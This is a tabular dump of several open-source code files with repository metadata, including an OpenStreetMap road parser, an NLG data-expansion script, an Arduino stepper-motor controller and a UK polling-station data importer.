hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
47170ca3654fffbe8da2a35f88340beab3b11a2b | 3,333 | py | Python | osm/parser.py | ChenZhongPu/osmRoad | 5c4ce5e7476b6f35c2917efa835c4f1a0f308ebf | [
"MIT"
] | 1 | 2019-05-02T21:33:05.000Z | 2019-05-02T21:33:05.000Z | osm/parser.py | ChenZhongPu/osmRoad | 5c4ce5e7476b6f35c2917efa835c4f1a0f308ebf | [
"MIT"
] | 1 | 2019-05-02T22:55:43.000Z | 2019-05-02T22:55:43.000Z | osm/parser.py | ChenZhongPu/osmRoad | 5c4ce5e7476b6f35c2917efa835c4f1a0f308ebf | [
"MIT"
] | 3 | 2019-05-02T22:37:42.000Z | 2021-04-24T05:59:32.000Z | # --------------------------------------------------------------------
# The osmRoad is
#
# Copyright (c) 2018 by Zhongpu Chen (chenloveit@gmail.com)
#
# By obtaining, using, and/or copying this software and/or its
# associated documentation, you agree that you have read, understood,
# and will comply with the following terms and conditions:
#
# Permission to use, copy, modify, and distribute this software and
# its associated documentation for any purpose and without fee is
# hereby granted, provided that the above copyright notice appears in
# all copies, and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Secret Labs AB or the author not be used in advertising or publicity
# pertaining to distribution of the software without specific, written
# prior permission.
#
# SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD
# TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANT-
# ABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR
# BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY
# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
# OF THIS SOFTWARE.
# --------------------------------------------------------------------
import xml.etree.cElementTree as et
def load_osm(filename):
root = et.parse(filename).getroot()
return root
def load_parse_osm(filename):
root = load_osm(filename)
return {'bound': parse_bound(root), 'nodes': parse_node(root), 'ways': parse_way(root)}
def load_parse_osmxy(filename):
root = load_osm(filename)
return {'bound': parse_bound(root), 'nodes': parse_nodexy(root), 'ways': parse_way(root)}
def parse_bound(root):
bound = root.findall('bounds')[0]
xmin = float(bound.attrib['minlon'])
xmax = float(bound.attrib['maxlon'])
ymin = float(bound.attrib['minlat'])
ymax = float(bound.attrib['maxlat'])
return {'xmin': xmin, 'xmax': xmax, 'ymin': ymin, 'ymax': ymax}
def parse_nodexy(root):
nodes = {}
for node in root.findall('node'):
nodes[int(node.attrib['id'])] = (float(node.attrib['lon']), float(node.attrib['lat']))
return nodes
def parse_node(root):
nodes = {}
idx = 0
for node in root.findall('node'):
nodes[int(node.attrib['id'])] = idx
idx += 1
return nodes
def parse_way(root):
# refer to https://wiki.openstreetmap.org/wiki/Key:highway
road_vals = ['motorway', 'motorway_link', 'trunk', 'trunk_link',
'primary', 'primary_link', 'secondary', 'secondary_link',
'tertiary', 'road', 'residential', 'living_street',
'service', 'services', 'motorway_junction']
ways = []
for way in root.findall('way'):
nodes = []
for node in way.findall('nd'):
nodes.append(int(node.attrib['ref']))
tags = {}
for tag in way.findall('tag'):
tags[tag.attrib['k']] = tag.attrib['v']
# only highway is kept
if 'highway' not in tags:
continue
if tags['highway'] not in road_vals:
continue
ways.append((nodes, tags))
return ways
| 35.457447 | 94 | 0.643264 | 437 | 3,333 | 4.84897 | 0.407323 | 0.023596 | 0.030203 | 0.013214 | 0.143464 | 0.143464 | 0.100047 | 0.100047 | 0.100047 | 0.100047 | 0 | 0.002644 | 0.205521 | 3,333 | 93 | 95 | 35.83871 | 0.797583 | 0.432343 | 0 | 0.208333 | 0 | 0 | 0.142397 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145833 | false | 0 | 0.020833 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4718c7e9cd589624b9835b0bd07e75e39f735f11 | 8,319 | py | Python | cs-restaurant/input/devel/expand.py | stg880631/tgen | 67db94bf3bfc851e673e50b84230ed9f533b2c23 | [
"Apache-2.0"
] | null | null | null | cs-restaurant/input/devel/expand.py | stg880631/tgen | 67db94bf3bfc851e673e50b84230ed9f533b2c23 | [
"Apache-2.0"
] | null | null | null | cs-restaurant/input/devel/expand.py | stg880631/tgen | 67db94bf3bfc851e673e50b84230ed9f533b2c23 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
import sys
import codecs
from argparse import ArgumentParser
from util import load_dais, load_texts, write_das, write_texts, write_toks, DAI
import kenlm
import numpy as np
from delexicalize import Delexicalizer
from tgen.logf import log_info
def da_key(da):
return "&".join([unicode(dai) for dai in sorted(da, key=lambda dai: (dai.slot, dai.value))])
class Expander(object):
SPECIAL_VALUES = [None, '', 'dont_care', 'none', 'yes', 'no',
'yes or no', 'no or yes', 'restaurant']
def __init__(self, args):
# read inputs
self.orig_das = load_dais(args.orig_das)
self.transl_das = load_dais(args.transl_das)
self.transl_texts = load_texts(args.transl_texts)
# run delexicalization, store tokens + lemmas + tags, delex DAs
self.delexicalizer = Delexicalizer(args.slots, args.surface_forms,
args.tagger_model, args.tagger_overrides,
output_format='factors')
log_info("Delexicalizing...")
self.delex_texts = []
self.delex_das = []
vals_to_forms = []
for counter, (da, text) in enumerate(zip(self.transl_das, self.transl_texts)):
delex_text, v2f = self.delexicalizer.delexicalize_text(text, da, counter)
vals_to_forms.extend(v2f)
self.delex_texts.append(delex_text)
self.delex_das.append(self.delexicalizer.delexicalize_da(da))
self.values = self.get_values(vals_to_forms)
log_info("Grouping DAs...")
self.orig_da_positions = self.group_das(self.orig_das, check_delex=True)
self.transl_da_positions = self.group_das(self.delex_das)
self.out_texts = [None] * len(self.orig_das)
self.out_delex_texts = [None] * len(self.orig_das)
self.out_das = [None] * len(self.orig_das)
self.out_delex_das = [None] * len(self.orig_das)
log_info("Loading LM...")
self.lm = kenlm.Model(args.lm)
self.out_texts_file = args.out_texts
self.out_delex_texts_file = args.out_delex_texts
self.out_das_file = args.out_das
self.out_delex_das_file = args.out_delex_das
def expand(self):
log_info("Expanding...")
for da_key, (da, orig_pos) in self.orig_da_positions.iteritems():
if da_key not in self.transl_da_positions:
print >> sys.stderr, "DA key not found: %s" % da_key
print >> sys.stderr, "Original positions: %s" % ", ".join([str(p) for p in orig_pos])
continue
_, transl_pos = self.transl_da_positions[da_key]
self.expand_da(da, orig_pos, transl_pos)
def expand_da(self, da, orig_pos, transl_pos):
# count # of different realizations for the given DA
orig_count = len(orig_pos)
transl_count = len(transl_pos)
assert(orig_count > 0)
assert(transl_count > 0)
assert(transl_count <= orig_count)
# score all realizations by a LM
scores = []
for pos in transl_pos:
scores.append(self.lm.score(" ".join([lemma for _, lemma, _ in self.delex_texts[pos]])))
# normalize scores into a prob dist (~ apply softmax)
max_score = max(scores)
scores = np.array(scores) - max_score
scores = np.exp(scores)
scores /= np.sum(scores)
# save the original stuff into the new positions
for opos_, tpos_ in zip(orig_pos, transl_pos):
self.out_texts[opos_] = self.transl_texts[tpos_]
self.out_delex_texts[opos_] = [tok for tok, _, _ in self.delex_texts[tpos_]]
self.out_das[opos_] = self.transl_das[tpos_]
self.out_delex_das[opos_] = self.delex_das[tpos_]
# sample missing stuff from that distribution
# TODO mark them to be checked
repls = np.random.choice(transl_pos, orig_count - transl_count, p=scores)
for opos_, tpos_ in zip(orig_pos[transl_count:], repls):
relex_text, relex_da = self.relexicalize(self.delex_texts[tpos_],
self.delex_das[tpos_])
self.out_texts[opos_] = relex_text
self.out_delex_texts[opos_] = [tok for tok, _, _ in self.delex_texts[tpos_]]
self.out_das[opos_] = relex_da
self.out_delex_das[opos_] = self.delex_das[tpos_]
def relexicalize(self, text, da):
text = " ".join([tok for tok, _, _ in text])
text = re.sub(r' ([?.,\'])', r'\1', text)
da = [DAI(dai.dat, dai.slot, dai.value) for dai in da] # deep copy
changed = False
for dai in da:
if dai.value in self.SPECIAL_VALUES:
continue
changed = True
# relexicalize DA
form = re.search(r'X-' + dai.slot + r'(/(?:n|adj|adv|v):?(?:[0-9X]|attr|fin)?)?', text).group(1) or ""
# relexicalize text
if len(self.values[dai.slot][form]) == 1:
# TODO enable reinflection?
# TODO restauraci Švejk = n:1
print >> sys.stderr, "Singleton value: %s %s %s" % (dai.slot, form, unicode(self.values[dai.slot][form]))
values = list(self.values[dai.slot][form])
value = np.random.choice(len(values))
value, surface = values[value]
dai.value = value
text = re.sub(r'X-' + dai.slot + r'(/[^ .,;!?]*)?', surface, text)
text = ('!CHECK ' if changed else '') + text
return text, da
def group_das(self, das, check_delex=False):
groups = {}
for cur_pos, da in enumerate(das):
key = da_key(da)
if check_delex:
delex_da = self.delexicalizer.delexicalize_da(da)
delex_key = da_key(delex_da)
if delex_key != key:
print >> sys.stderr, "DA not properly delexicalized: %d - %s" % (cur_pos, key)
da = delex_da
key = delex_key
pos = groups.get(key, (None, []))[1]
pos.append(cur_pos)
groups[key] = (da, pos)
return groups
def get_values(self, vals_to_forms_list):
ret = {}
for slot, value, form, tokens in vals_to_forms_list:
if slot not in ret:
ret[slot] = {}
if form not in ret[slot]:
ret[slot][form] = set()
ret[slot][form].add((value, " ".join(tokens)))
return ret
def write_outputs(self):
log_info("Writing outputs...")
write_texts(self.out_texts_file, self.out_texts)
write_toks(self.out_delex_texts_file, self.out_delex_texts,
capitalize=False, detok=False, lowercase=True)
write_das(self.out_das_file, self.out_das)
write_das(self.out_delex_das_file, self.out_delex_das)
def main():
ap = ArgumentParser()
ap.add_argument('-l', '--lm', type=str, help='KenLM language model on lowercased, delexicalized,' +
'tokenized texts')
ap.add_argument('-s', '--slots', type=str, help='List of slots to delexicalize')
ap.add_argument('-f', '--surface-forms', type=str, help='Input file with surface forms for slot values')
ap.add_argument('-t', '--tagger-model', type=str, help='Path to Morphodita tagger model')
ap.add_argument('-o', '--tagger-overrides', type=str, help='Path to a JSON file with tagger overrides')
ap.add_argument('orig_das', type=str, help='Input delexicalized original DAs')
ap.add_argument('transl_das', type=str, help='Input lexicalized translated DAs')
ap.add_argument('transl_texts', type=str, help='Input lexicalized translated texts')
ap.add_argument('out_texts', type=str, help='Output lexicalized texts')
ap.add_argument('out_delex_texts', type=str, help='Output delexicalized texts')
ap.add_argument('out_das', type=str, help='Output lexicalized DAs')
ap.add_argument('out_delex_das', type=str, help='Output delexicalized DAs')
args = ap.parse_args()
np.random.seed(1206)
ex = Expander(args)
ex.expand()
ex.write_outputs()
if __name__ == '__main__':
main()
| 40.383495 | 121 | 0.60464 | 1,109 | 8,319 | 4.306583 | 0.201082 | 0.035176 | 0.030151 | 0.021357 | 0.252513 | 0.114531 | 0.073492 | 0.073492 | 0.041457 | 0.026801 | 0 | 0.002649 | 0.274071 | 8,319 | 205 | 122 | 40.580488 | 0.78821 | 0.056137 | 0 | 0.039474 | 0 | 0.019737 | 0.111026 | 0.005232 | 0 | 0 | 0 | 0.004878 | 0.019737 | 1 | 0.059211 | false | 0 | 0.065789 | 0.006579 | 0.164474 | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
471ba427f7183a39af603bd2c7e5e3442783239a | 3,908 | py | Python | rpi-config/scripts/arduinoMotor.py | DiamondLightSource/rpi-config | 617f5e176c0621e3ea1b567e9586e96ba0f8b5db | [
"Apache-2.0"
] | 4 | 2016-08-23T12:13:21.000Z | 2018-08-22T12:55:55.000Z | rpi-config/scripts/arduinoMotor.py | DiamondLightSource/rpi-config | 617f5e176c0621e3ea1b567e9586e96ba0f8b5db | [
"Apache-2.0"
] | null | null | null | rpi-config/scripts/arduinoMotor.py | DiamondLightSource/rpi-config | 617f5e176c0621e3ea1b567e9586e96ba0f8b5db | [
"Apache-2.0"
] | 2 | 2016-09-15T19:17:30.000Z | 2018-03-06T06:34:13.000Z | from gda.device.scannable import PseudoDevice
from arduinoScannable import arduinoScannable
import time
from org.slf4j import LoggerFactory
logger = LoggerFactory.getLogger(__name__ + '.py')
class arduinoMotor(PseudoDevice):
def __init__(self, name, stepsPerRotation, motorPin1, motorPin2, motorPin3, motorPin4):
self.setName(name) # required
self.setInputNames(["Angle (Degrees)"]) # required
self.setExtraNames(["Position (Steps)"]) # required
self.setOutputFormat(["%s", "%s"]) # required
self.motorPin1 = motorPin1
self.motorPin2 = motorPin2
self.motorPin3 = motorPin3
self.motorPin4 = motorPin4
self.stepAngleConversion = 360.0/stepsPerRotation
self.currentPhase = 0
self.busyTest = False
def getPosition(self):
return [self.stepsToDegrees(self.currentPhase), self.currentPhase]
def stepsToDegrees(self, valSteps):
logger.debug("Steps: "+str(valSteps))
if valSteps != 0:
valDegrees = valSteps * self.stepAngleConversion
return valDegrees
else:
return 0
def degreesToSteps(self, valDegrees):
logger.debug("Degrees: "+str(valDegrees))
if valDegrees != 0:
valSteps = valDegrees / self.stepAngleConversion
return valSteps
else:
return 0
def asynchronousMoveTo(self,newPosition):
newPosition = self.degreesToSteps(newPosition)
logger.trace("New Position: "+str(newPosition))
self.busyTest = True
#targetPhase = self.currentPhase + newPosition ##relative positioning
targetPhase = newPosition
if targetPhase%1 < 0.5:
targetPhase = int(targetPhase)
else:
targetPhase = int(targetPhase) + 1
while self.currentPhase != targetPhase:
logger.trace("Current Phase: "+str(self.currentPhase))
logger.trace("Target Phase: "+str(targetPhase))
if targetPhase < self.currentPhase:
self.currentPhase -= 1
elif targetPhase > self.currentPhase:
self.currentPhase += 1
phaseMod = self.currentPhase%8
logger.trace("Phase Mod: " + str(phaseMod))
if (phaseMod == 1):
self.motorPin1.asynchronousMoveTo(1)
self.motorPin2.asynchronousMoveTo(0)
self.motorPin4.asynchronousMoveTo(0)
elif (phaseMod == 2):
self.motorPin1.asynchronousMoveTo(1)
self.motorPin2.asynchronousMoveTo(1)
elif (phaseMod == 3):
self.motorPin1.asynchronousMoveTo(0)
self.motorPin2.asynchronousMoveTo(1)
self.motorPin3.asynchronousMoveTo(0)
elif (phaseMod == 4):
self.motorPin2.asynchronousMoveTo(1)
self.motorPin3.asynchronousMoveTo(1)
elif (phaseMod == 5):
self.motorPin2.asynchronousMoveTo(0)
self.motorPin3.asynchronousMoveTo(1)
self.motorPin4.asynchronousMoveTo(0)
elif (phaseMod == 6):
self.motorPin3.asynchronousMoveTo(1)
self.motorPin4.asynchronousMoveTo(1)
elif (phaseMod == 7):
self.motorPin1.asynchronousMoveTo(0)
self.motorPin3.asynchronousMoveTo(0)
self.motorPin4.asynchronousMoveTo(1)
elif (phaseMod == 0):
self.motorPin1.asynchronousMoveTo(1)
self.motorPin4.asynchronousMoveTo(1)
else:
pass
time.sleep(0.1)
self.busyTest = False
def isBusy(self):
return self.busyTest | 39.877551 | 91 | 0.575486 | 326 | 3,908 | 6.874233 | 0.239264 | 0.10174 | 0.071843 | 0.055332 | 0.344935 | 0.281571 | 0.168675 | 0 | 0 | 0 | 0 | 0.030478 | 0.336745 | 3,908 | 98 | 92 | 39.877551 | 0.834105 | 0.026612 | 0 | 0.325581 | 0 | 0 | 0.028444 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069767 | false | 0.011628 | 0.046512 | 0.023256 | 0.197674 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
471e1e651b0efcca16a531bc8067e597b5c516f6 | 2,986 | py | Python | polling_stations/apps/data_collection/management/commands/import_torbay.py | alexsdutton/UK-Polling-Stations | 01ec234fd4a832694870d5ed9de069a228397f53 | [
"BSD-3-Clause"
] | null | null | null | polling_stations/apps/data_collection/management/commands/import_torbay.py | alexsdutton/UK-Polling-Stations | 01ec234fd4a832694870d5ed9de069a228397f53 | [
"BSD-3-Clause"
] | null | null | null | polling_stations/apps/data_collection/management/commands/import_torbay.py | alexsdutton/UK-Polling-Stations | 01ec234fd4a832694870d5ed9de069a228397f53 | [
"BSD-3-Clause"
] | null | null | null | from data_collection.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "E06000027"
addresses_name = "local.2019-05-02/Version 1/Democracy_Club__02May2019tor.tsv"
stations_name = "local.2019-05-02/Version 1/Democracy_Club__02May2019tor.tsv"
elections = ["local.2019-05-02"]
csv_delimiter = "\t"
def station_record_to_dict(self, record):
if record.polling_place_id == "6337":
record = record._replace(polling_place_postcode="TQ5 0BX")
if record.polling_place_id == "6331":
record = record._replace(polling_place_postcode="TQ5 9HW")
return super().station_record_to_dict(record)
def address_record_to_dict(self, record):
rec = super().address_record_to_dict(record)
uprn = record.property_urn.strip().lstrip("0")
if uprn == "679205":
rec["postcode"] = "BS161PF"
rec["accept_suggestion"] = False
if uprn in [
"100041196260", # TQ26AS -> TQ26AP : Millbrook House Hotel, Old Mill Road, Torquay
"200001778568", # TQ14AF -> TQ14AG : 1C Magdalene Rd Rear Of, 17 Upton Road, Torquay
"100040561357", # TQ14LR -> TQ14LH : Flat 2 Westhill Court, 12 Westhill Avenue, Torquay
"100040561358", # TQ14LR -> TQ14LH : Flat 3 Westhill Court, 12 Westhill Avenue, Torquay
"100040559288", # TQ11EJ -> TQ11EG : 2 Apsley House, Torwood Gardens Road, Torquay
"100040559289", # TQ11EJ -> TQ11EG : 3 Apsley House, Torwood Gardens Road, Torquay
"10002989359", # TQ50BX -> TQ50BP : The Hayloft, 26 Milton Street, Brixham
]:
rec["accept_suggestion"] = True
if uprn in [
"100040523809", # TQ26AU -> TQ46AU : Cottage C, 1 Old Mill Road, Torquay
"100041187152", # TQ12EA -> TQ11BN : Cottage 1 Sundial Lodge, Park Hill Road, Torquay
"100041187013", # TQ12EA -> TQ11BN : Mews 8 Sundial Lodge, Park Hill Road, Torquay
"100040534293", # TQ32HW -> TQ32SF : Bottom Flat, 239 Torquay Road, Paignton
"10000012748", # TQ32HT -> TQ50EH : 1 Manor Court, Manor Road, Paignton
"10000012807", # TQ32HT -> TQ50EH : 7 Manor Court, Manor Road, Paignton
"10000012810", # TQ32HT -> TQ50EH : 4 Manor Court, Manor Road, Paignton
"100041195363", # TQ32HT -> TQ25BZ : 9 Manor Court, Manor Road, Paignton
"10000012832", # TQ32HT -> TQ50EH : 5 Manor Court, Manor Road, Paignton
"10000012760", # TQ32HT -> TQ50EH : 2 Manor Court, Manor Road, Paignton
"10000012746", # TQ32HT -> TQ50EH : 3 Manor Court, Manor Road, Paignton
"10000012765", # TQ32HT -> TQ50EH : 6 Manor Court, Manor Road, Paignton
"10000013683", # TQ58AG -> TQ59DJ : Flat 2, 67a Fore Street, Brixham
]:
rec["accept_suggestion"] = False
return rec
| 50.610169 | 100 | 0.630944 | 329 | 2,986 | 5.613982 | 0.462006 | 0.058473 | 0.06497 | 0.082296 | 0.413644 | 0.214402 | 0.10287 | 0.05739 | 0.05739 | 0.05739 | 0 | 0.186758 | 0.266577 | 2,986 | 58 | 101 | 51.482759 | 0.656621 | 0.401206 | 0 | 0.130435 | 0 | 0 | 0.266553 | 0.065648 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.043478 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
472180e30875c4ac8339f38fa4c6fde5ae82de74 | 376 | py | Python | nlp100/12.py | walkingmask/expr4-dm-2016 | b62d4c9d57ea8e4efe044fc98e4bdc365e87666d | [
"MIT"
] | null | null | null | nlp100/12.py | walkingmask/expr4-dm-2016 | b62d4c9d57ea8e4efe044fc98e4bdc365e87666d | [
"MIT"
] | null | null | null | nlp100/12.py | walkingmask/expr4-dm-2016 | b62d4c9d57ea8e4efe044fc98e4bdc365e87666d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# 12.py
# 2016/10/11(火)
# walkingmask
# check
# cut -f1 hightemp.txt
# cut -f2 hightemp.txt
col1f = open('col1.txt', 'w')
col2f = open('col2.txt', 'w')
for line in open('hightemp.txt', 'r'):
raw = line.rstrip().replace("\t"," ").split(" ")
col1f.write(raw[0]+"\n")
col2f.write(raw[1]+"\n")
col1f.close()
col2f.close()
| 17.090909 | 50 | 0.590426 | 60 | 376 | 3.7 | 0.666667 | 0.148649 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 0.148936 | 376 | 21 | 51 | 17.904762 | 0.61875 | 0.327128 | 0 | 0 | 0 | 0 | 0.159184 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
47223575ffe3dacf450a360bb6f35695e71e393c | 1,115 | py | Python | libnd4j/include/graph/generated/nd4j/graph/DataType.py | nutonchain/Deeplearning | 20f222c1eff95205c6c9c9b666b04402405e4442 | [
"Apache-2.0"
] | 1 | 2018-08-29T05:46:54.000Z | 2018-08-29T05:46:54.000Z | libnd4j/include/graph/generated/nd4j/graph/DataType.py | nutonchain/Deeplearning | 20f222c1eff95205c6c9c9b666b04402405e4442 | [
"Apache-2.0"
] | null | null | null | libnd4j/include/graph/generated/nd4j/graph/DataType.py | nutonchain/Deeplearning | 20f222c1eff95205c6c9c9b666b04402405e4442 | [
"Apache-2.0"
] | 1 | 2020-12-13T22:26:47.000Z | 2020-12-13T22:26:47.000Z | ################################################################################
# Copyright (c) 2015-2018 Skymind, Inc.
#
# This program and the accompanying materials are made available under the
# terms of the Apache License, Version 2.0 which is available at
# https://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# SPDX-License-Identifier: Apache-2.0
################################################################################
# automatically generated by the FlatBuffers compiler, do not modify
# namespace: graph
class DataType(object):
INHERIT = 0
BOOL = 1
FLOAT8 = 2
HALF = 3
HALF2 = 4
FLOAT = 5
DOUBLE = 6
INT8 = 7
INT16 = 8
INT32 = 9
INT64 = 10
UINT8 = 11
UINT16 = 12
UINT32 = 13
UINT64 = 14
QINT8 = 15
QINT16 = 16
| 27.875 | 80 | 0.591031 | 138 | 1,115 | 4.775362 | 0.775362 | 0.036419 | 0.045524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.064407 | 0.206278 | 1,115 | 39 | 81 | 28.589744 | 0.680226 | 0.577578 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
47226c18564ce8f55f4fdb06c8ed33bfda9ac9a4 | 1,026 | py | Python | tests/test_app.py | Habbie/stockbot | 648e70604828d0ed762c243b4eb83122fd393b4d | [
"Apache-2.0"
] | null | null | null | tests/test_app.py | Habbie/stockbot | 648e70604828d0ed762c243b4eb83122fd393b4d | [
"Apache-2.0"
] | 16 | 2017-10-12T09:10:28.000Z | 2021-05-20T20:30:15.000Z | tests/test_app.py | Habbie/stockbot | 648e70604828d0ed762c243b4eb83122fd393b4d | [
"Apache-2.0"
